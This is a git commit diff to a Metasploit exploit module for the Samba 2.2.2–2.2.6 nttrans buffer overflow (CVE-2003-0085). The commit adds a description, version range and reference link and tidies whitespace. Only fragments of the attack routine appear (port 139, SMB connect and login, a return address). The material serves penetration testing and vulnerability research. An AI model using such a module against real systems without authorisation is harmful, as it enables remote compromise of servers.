add description, versions, fix whitespace
git-svn-id: file:///home/svn/framework3/trunk@9167 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
b2f338984b
commit
4f364e2830
|
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
|
@ -20,9 +18,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba nttrans Overflow',
|
||||
'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit a buffer overflow vulnerability present in
|
||||
versions 2.2.2 through 2.2.6 of Samba.
|
||||
|
||||
The Samba developers report this as:
|
||||
"Bug in the length checking for encrypted password change requests from clients."
|
||||
|
||||
The bug was discovered and reported by the Debian Samba Maintainers.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -32,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2003-0085' ],
|
||||
[ 'OSVDB', '6323' ],
|
||||
[ 'BID', '7106' ],
|
||||
[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
|
@ -57,7 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
Opt::RPORT(139)
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -71,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# 0x081b8138
|
||||
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
|
|
Loading…
Reference in New Issue